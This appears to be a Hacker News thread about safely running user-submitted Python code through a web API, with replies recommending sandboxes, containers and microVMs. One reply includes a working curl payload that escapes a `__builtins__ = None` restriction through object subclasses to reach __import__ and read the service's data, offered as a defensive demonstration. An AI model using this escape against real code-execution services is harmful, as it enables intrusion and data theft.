As a little weekend project, I'm trying to build an API to run python code and wondering what might go wrong.<p>Specifically, is there any way of building such a service that is safe from being hacked? My guess is that letting users input code that will be ran is never save, but I'd love some input on this.<p>The API can be tested here: https://api-run-code.herokuapp.com/
... and here is the code: https://github.com/nathanganser/api-to-execute-python<p>For context, I'm thinking about building an app that needs to run user-inputted python code, and since I could not find a service that makes this easy, I just built an MVP of it.
You can use seccomp for this, which might allow you to build something very safe. Pypy also has a similar mechanism built-in: <a href="https://doc.pypy.org/en/latest/sandbox.html" rel="nofollow">https://doc.pypy.org/en/latest/sandbox.html</a> Or you can use virtual machines (you can build/find some that will boot in a few milliseconds)<p>edit: Your specific protection appears to be `__builtins__ = None` and otherwise run in the same interpreter. It is very naive. Here is an example hack that gets to your "secret data":<p><pre><code> $ curl -H Content-Type:application/json -d '{"code": "res = [c for c in ().__class__.__base__.__subclasses__() if c.__name__ == \"catch_warnings\"][0]()._module.__builtins__[\"__import__\"](\"play\").data"}' https://api-run-code.herokuapp.com/execute
{"res":{"a":33}}
</code></pre>
(from <a href="https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html" rel="nofollow">https://nedbatchelder.com/blog/201206/eval_really_is_dangero...</a> but really you could have googled it)
(Late to the party, but PyCoder's Weekly brought me here)<p>The method I use for my autograder research platform is:<p>1) Build a test suite as a JSON string that gets passed to queue; on the student's side, they're given a Job ID that will check every few seconds on the job's status<p>2) When its their turn, I pass the submission to a Docker image<p>3) The docker image dumps the student's code into a "submission.py" file and then dynamically builds the test cases based on what came in the JSON file (using Python's unittest library)<p>3) Save the code's test results to my DB and mark the job ID as "done"<p>4) Once the student's AJAX request sees a "done", it also returns the test results as a JSON string, which is then parsed on to the screen<p>In terms of "safety", the big issues you'll need to test for are making sure that Docker does not have root access. Try to dig up some Docker vulnerabilities to poke holes in your system. You can also whitelist only a select number of libraries so users don't go importing things with vulnerabilities.
Here are some references:<p><pre><code> - Giles Thomas - Lessons Learned from Serving 1/4 million in-browser Python Consoles with Tornado - EuroPython2013
- Link: https://www.youtube.com/watch?v=U_qp8u_BH_E
- Description: Giles is from PythonAnywhere, the author of [Interactive shells on Python.org](https://blog.pythonanywhere.com/83/) blog post.
- PythonAnywhere uses:
- SockJS:
- Repo: https://github.com/sockjs
- pty (Python built-in module) for handling pseudo-terminals (with pty.fork):
- Docs: https://docs.python.org/3.7/library/pty.html
- epoll (Tornado's IOLoop.add_handler for async):
- Docs: https://www.tornadoweb.org/en/stable/
- Xterm.js: Terminal on the browser at https://xtermjs.org/
- Jessica McKellar: Building and Breaking a Python Sandbox - Pycon 2014:
- Link: https://www.youtube.com/watch?v=sL_syMmRkoU
- pysandbox (author recommends running Python in a sandbox, not the opposite)
- Interactive Shells on Python.org:
- Link: https://blog.pythonanywhere.com/83/
- CodeSandbox: Online web application editor (Angular, React, Vue, Vanilla JS)
- Website: https://codesandbox.io/
- Repo: https://github.com/codesandbox/codesandbox-client
- Kaggle:
- Description: Kaggle's infrastructure and systems allow for arbitrary code execution and scoring. It would be good to check it out and see what they get right.
- Kaggle Learntools:
- Purpose: Check exercises and notebooks submitted by users
- Link: https://github.com/Kaggle/learntools
- Kaggle Docker:
- Purpose: Kaggle Python docker image
- Link: https://github.com/Kaggle/docker-python/
- Kaggle Infrastructure (Lessons Learned from Tens of Thousands of Kaggle Notebooks):
- Link: https://www.youtube.com/watch?v=ENPBTl0uNOE
- Miscellaneous Links:
- Jinja has a sandboxed environment:
- Link: https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py</code></pre>
Replit does this for their own services, and it seems like they might give you access to it, too[1].<p>That post is old and not very detailed, so maybe I'm misinterpreting it.<p>1. <a href="https://blog.replit.com/api-docs" rel="nofollow">https://blog.replit.com/api-docs</a>
You want to use some sort of sandbox or VM for this. Firecracker might fit your usecase: <a href="https://firecracker-microvm.github.io/" rel="nofollow">https://firecracker-microvm.github.io/</a>